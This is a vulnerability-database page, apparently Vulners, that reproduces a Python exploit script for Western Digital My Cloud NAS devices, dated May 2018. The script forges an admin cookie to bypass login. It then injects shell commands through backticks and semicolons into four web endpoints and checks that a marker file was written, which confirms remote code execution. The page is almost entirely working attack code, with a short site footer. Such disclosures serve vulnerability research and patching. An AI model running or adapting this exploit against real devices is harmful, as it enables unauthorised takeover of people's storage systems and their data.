Vulners
Lucene search
Western Digital My Cloud vulnerable to multiple command injection vulnerabilities
import requests
import time
import inspect
import sys
mycloud_addr="127.0.0.1"
headers = {"Cookie": "username=admin; isAdmin=1"}
dryrun = False
def dump_request(req):
print "{}\n{}\n{}\n\n{}".format(
'-----------START-----------',
req.method + ' ' + req.url,
'\n'.join('{}: {}'.format(k, v) for k, v in req.headers.items()),
req.body)
def gen_rce_test_file():
return "/var/www/fsociety_%s.dat" % int(time.time())
def verify_test_file(test_file):
test_endpoint = "http://%s/%s" % (mycloud_addr, test_file[len('/var/www/'):])
print "[+] Verify test file on %s" % test_endpoint
if requests.get(test_endpoint).status_code == requests.codes.ok:
print "[+] Successfully exploited RCE"
else:
print "[-] Failed to validate RCE"
def do_post(endpoint, payload, test_file):
req = requests.Request("POST", "http://%s/%s" % (mycloud_addr, endpoint), headers=headers, data=payload)
prepared = req.prepare()
if dryrun:
dump_request(prepared)
else:
s = requests.Session()
resp = s.send(prepared)
if resp.status_code == requests.codes.ok:
verify_test_file(test_file)
else:
print "[-] Failed to exploit RCE"
def do_get(endpoint, payload, test_file):
req = requests.Request("GET", "http://%s/%s" % (mycloud_addr, endpoint), headers=headers, params=payload)
prepared = req.prepare()
if dryrun:
dump_request(prepared)
else:
s = requests.Session()
resp = s.send(prepared)
if resp.status_code == requests.codes.ok:
verify_test_file(test_file)
else:
print "[-] Failed to exploit RCE"
def exploit_remote_backups():
print "[+] Exploiting remote backups"
endpoint = "web/php/remoteBackups.php"
test_file = gen_rce_test_file()
payload = {
"cmd": "getRecoverItems",
"jobName": "`touch %s; echo foo`" % test_file
}
do_post(endpoint, payload, test_file)
def exploit_chk_vv_sharename():
print "[+] Exploiting chk_vv_sharename"
endpoint = "web/php/chk_vv_sharename.php"
test_file = gen_rce_test_file()
payload = {"vv_sharename": "`touch %s; echo foo`" % test_file}
do_get(endpoint, payload, test_file)
def exploit_raid_cgi():
print "[+] Exploiting raid cgi"
endpoint = "web/storage/raid_cgi.php"
test_file = gen_rce_test_file()
payload={"cmd": "cgi_Run_Smart_Test", "run_cmd": "touch %s" % test_file}
do_post(endpoint, payload, test_file)
def exploit_ganalytics():
print "[+] Exploiting ganalytics"
endpoint = "web/google_analytics.php"
test_file = gen_rce_test_file()
payload={"cmd": "set", "opt": "pv-backups", "arg": "; touch %s" % test_file}
do_post(endpoint, payload, test_file)
def all_exploits():
return [obj for name,obj in inspect.getmembers(sys.modules[__name__]) if (inspect.isfunction(obj) and name.startswith('exploit'))]
for f in all_exploits():
f()
time.sleep(1)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 May 2018 00:00Current
0.3Low risk
Vulners AI Score0.3